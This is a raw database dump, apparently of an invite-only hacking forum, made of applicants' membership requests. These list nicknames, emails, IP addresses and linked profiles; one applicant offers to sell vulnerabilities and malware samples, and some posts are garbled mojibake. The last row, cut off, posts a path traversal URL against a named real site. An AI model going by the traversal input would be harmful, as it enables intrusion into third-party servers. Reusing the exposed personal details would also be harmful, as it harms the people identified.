0, 1, 0, 0, 0), (1813, 1594, 0, 'Invite', 2, '{$name}', 1409158065, '[SIZE=\'4\'][COLOR=\'Sienna\']me6[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: me6@hush.ai\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knodledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.26.64.16\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://me6.com | me6.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1814, 1595, 0, 'Invite', 2, '{$name}', 1409178713, '[SIZE=\'4\'][COLOR=\'Sienna\']Jessus1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: jesusserrano742@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.139.199.22\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ru.peperonity.com/go/profile/3/jessus1 | http://ru.peperonity.com/go/profile/3/jessus1 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1815, 1596, 0, 'Invite', 2, '{$name}', 1409178858, '[SIZE=\'4\'][COLOR=\'Sienna\']Jessus1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: jesusserrano742@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.139.199.22\n[*][b]real ip[/b]: 2.139.199.22\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ru.peperonity.com/go/profile/3/jessus1 | http://ru.peperonity.com/go/profile/3/jessus1 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1816, 1597, 0, 'Invite', 2, '{$name}', 1409183280, '[SIZE=\'4\'][COLOR=\'Sienna\']cazanova163[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cazanova@x3x.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.109.177.26\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; CrOS x86_64 5978.59.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://cardingmafia.su/members/cazanova163.html | http://cardingmafia.su/members/cazanova163.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1818, 1599, 0, 'Invite', 2, '{$name}', 1409207204, '[SIZE=\'4\'][COLOR=\'Sienna\']Johnnyboyy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: drnod@jabber.iitsp.com\n[b]e-mail[/b]: sniperfox@openmailbox.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.150.168.95\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.gaystarnews.com/users/johnnyboyy | http://www.gaystarnews.com/users/johnnyboyy \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1819, 1600, 0, 'Invite', 2, '{$name}', 1409210319, '[SIZE=\'4\'][COLOR=\'Sienna\']raas[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: rsp_emperor@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 31.59.75.21\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://raas.ru | raas.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1820, 1601, 0, 'Invite', 2, '{$name}', 1409229962, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 158.255.211.156\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.8 (KHTML, like Gecko) Version/8.0 Safari/600.1.8\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/nicknameband | http://vk.com/nicknameband \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1821, 1602, 0, 'Invite', 2, '{$name}', 1409232838, '[SIZE=\'4\'][COLOR=\'Sienna\']dunfy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: me@dandunford.info\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 82.70.152.6\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://dunfy.be | dunfy.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1822, 1603, 0, 'Invite', 2, '{$name}', 1409246651, '[SIZE=\'4\'][COLOR=\'Sienna\']sandgun_cypher[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sandguncypher@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.243.217.129\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1823, 1604, 0, 'Invite', 2, '{$name}', 1409254700, '[SIZE=\'4\'][COLOR=\'Sienna\']subzerofrozeu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: subzerofrozeu@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 96.38.41.202\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.steamid.co.uk/profile/76561198067316336 | http://www.steamid.co.uk/profile/76561198067316336 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1824, 1605, 0, 'Invite', 2, '{$name}', 1409262943, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: I am a pen tester with some vulnerabilities to trade or sell. Some of them are good - file path traversal, file upload, etc. I reverse-engineer malware at my job so I know a lot of VXing stuff. I have some malware samples to trade or just give away. I applied earlier when it was free to join, I talked to syslink about malware. I don\'t mind paying now if I have to.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.142.161.63\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1825, 1606, 0, 'Invite', 2, '{$name}', 1409266599, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: Last invite failed. I have to fill this in again I guess. I\'m a pen tester with some good shit to sell or trade. Specialize in finding file path exploits. I want to keep collecting malware samples and talk to people writing them. I have some sampels from the work I\'ve done.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 194.150.168.95\n[*][b]real ip[/b]: 178.20.55.16\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1826, 1607, 0, 'Invite', 2, '{$name}', 1409269650, '[SIZE=\'4\'][COLOR=\'Sienna\']checkermint[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: checkermint@lsd-25.ru\n[b]e-mail[/b]: checkermint@hellokitty.com\n[b]Info[/b]: I keep having to fill this out because of my browser settings. I have a lot of bugs to trade, most of them things like file path traversal on web hosts. I also want to trade malware samples and give some away. I take malware apart at my job. I talked to syslink about malware already and I wanted to join here for free.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 162.252.242.197\n[*][b]real ip[/b]: 162.252.242.197\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.flickr.com/photos/.../6228829506/ | https://www.flickr.com/photos/.../6228829506/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1827, 1608, 0, 'Invite', 2, '{$name}', 1409279492, '[SIZE=\'4\'][COLOR=\'Sienna\']nicotine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: f0f020002000@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.52.112.145\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/art_nicotine | http://vk.com/art_nicotine \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1828, 1609, 0, 'Invite', 2, '{$name}', 1409344961, '[SIZE=\'4\'][COLOR=\'Sienna\']w0rst[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Schiz0id@jabber.ru\n[b]e-mail[/b]: 1337g33k@jupimail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.104.224.42\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://w0rst-hardware.blogspot.com/ | http://w0rst-hardware.blogspot.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1829, 1610, 0, 'Invite', 2, '{$name}', 1409359490, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: lansanxing@163.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 110.17.251.192\n[*][b]real ip[/b]: 110.17.251.192\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1830, 1611, 0, 'Invite', 2, '{$name}', 1409386404, '[SIZE=\'4\'][COLOR=\'Sienna\']Freaktechz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: freaktechz@exploit.im\n[b]e-mail[/b]: freaktechz@yandex.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 101.222.248.204\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://freaktechz.blogspot.com | freaktechz.blogspot.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1831, 1083, 1119, 'Psych0tr1a', 11, '', 1409393547, 'ýðшûðÑÂÑŒ ÑÂúуûѠð ñþûьшþù üøшúð ýõ þтòõчðõт ýøóôõ( úþüу ÑÂтучðть úрþüõ ýõóþ ?', 1, 0, '', 0, 1, 0, 0, 0), (1832, 1083, 1119, 'w0rm', 1, '', 1409396083, 'öôõü ýõôõûьúу, ÿþтþü ýðчøýðõü руóðтьÑÂÑÂ...', 1, 0, '', 0, 1, 0, 0, 0), (1833, 1612, 0, 'unlog', 45, 'overpro.ru | Generic File Downloader', 1409398034, '[CODE]\r\nhttp://overpro.ru/upload/download.php?file=\r\nÛøÑÂтøýó фðùûþò ò ÿðÿúõ: http://overpro.ru/upload/download.php?file=../.\r\n[/CODE]\r\n\r\n[LIST]\r\n[*]íтþ ýõ LFI.\r\n[*]Óру÷øть 